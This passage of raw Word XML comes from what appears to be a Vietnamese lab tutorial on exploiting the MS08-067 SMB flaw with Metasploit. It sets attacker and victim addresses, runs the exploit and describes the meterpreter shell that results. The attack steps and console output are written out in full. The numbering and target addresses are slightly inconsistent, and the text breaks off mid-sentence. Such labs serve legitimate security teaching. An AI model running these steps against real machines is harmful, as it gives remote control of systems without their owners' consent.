    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="2E7C80AA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>LHOST =&gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="7960C50F" w14:textId="538F07B5">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00351B6D" w:rsidR="00415976" w:rsidP="3CE16CD3" w:rsidRDefault="00415976" w14:paraId="6EBB9A65" w14:textId="5D786812">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">//Có thể thay đổi cổng 4444 thành </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00351B6D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cổng khác: 4141, 4123... để tránh xung đột</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="6103CA3B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Thiết lập tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> là địa chỉ của máy bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="0D6BF0E9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="0105D265" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RHOST =&gt; 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="57652590" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="5E5ED9FB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="77DD6139" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="02E7CF42" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="1206BAB8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="2735F0FA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="5B6A5FEA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="1AEE7D96" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="4A549458" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="29CBDE4B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="0D1BB36C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F9529D" w:rsidP="00F9529D" w:rsidRDefault="00F9529D" w14:paraId="7ABEF758" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="008E3F20" w14:paraId="1074BF59" w14:textId="676E5741">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Xác định </w:t>
      </w:r>
      <w:r w:rsidR="00960746">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>hệ điều hành đích (victim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="69DD6636" w14:textId="60DD3C47">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; show targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6DA71E40" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit targets:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="3F406806" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="24E381E0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="46FA4418" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="0A131EC5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   1   Windows 2000 Universal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="1A901B13" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   2   Windows XP SP0/SP1 Universal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="256B6186" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="23891F4F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   13  Windows XP SP2 Danish (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5E82D411" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   14  Windows XP SP2 German (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="5C0E7D1F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Có thể chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Automatic Targeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="00CF4C67" w14:paraId="32E2EC26" w14:textId="1B20A8E3">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="008E3F20">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(ms08_067_netapi) &gt; set target 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="468A3822" w14:textId="09CF9670">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khai thác lỗ hổng (exploit) để tấn công từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="3F985162" w14:textId="42C87FB0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F458FF" w:rsidP="3CE16CD3" w:rsidRDefault="00F458FF" w14:paraId="24CC7099" w14:textId="00EC80D9">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23EBB429" w:rsidP="3CE16CD3" w:rsidRDefault="23EBB429" w14:paraId="138B2F0D" w14:textId="112523E8">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23EBB429" w:rsidP="3CE16CD3" w:rsidRDefault="23EBB429" w14:paraId="15BE3137" w14:textId="567D1840">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F458FF" w:rsidP="00F458FF" w:rsidRDefault="00F458FF" w14:paraId="7AF998C0" w14:textId="26625FB2">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F458FF" w:rsidP="3CE16CD3" w:rsidRDefault="00F458FF" w14:paraId="058D9A4C" w14:textId="074FD818">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="00F458FF" w:rsidP="00F458FF" w:rsidRDefault="00F458FF" w14:paraId="4B57C0F9" w14:textId="5B531FBA">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms08_067_netapi) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>run -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5176FF0E" w14:textId="6BEDB6A7">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="00A2630D" w14:paraId="47DF9C86" w14:textId="696EA2EF">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2630D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="546D95BF" wp14:editId="0B16A1F2">
            <wp:extent cx="5499383" cy="1416123"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="232533493" name="Picture 232533493" descr="A computer screen with text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533493" name="Picture 1" descr="A computer screen with text and numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499383" cy="1416123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="6495AEEB" w:rsidRDefault="008E3F20" w14:paraId="68849DE3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;&gt; Khi chạy lệnh exploit không mà không kết nối được ngay, chạy lại lệnh này nhiều lần để cố gắng kết nối từ xa.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00E93EBC" w:rsidR="00E93EBC" w:rsidTr="008E3F20" w14:paraId="10A1AD62" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="42AA0C2B" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F458FF" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="384CDE5B" w14:textId="7B0B0FB8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="00F458FF">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>âm nhập hệ thống victim dựa trên meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="25854153" w14:textId="4097A448">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="00211267">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nếu khai thác lổ hổng thành công sẽ xuất hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meterpreter shell.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="008E0AE5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
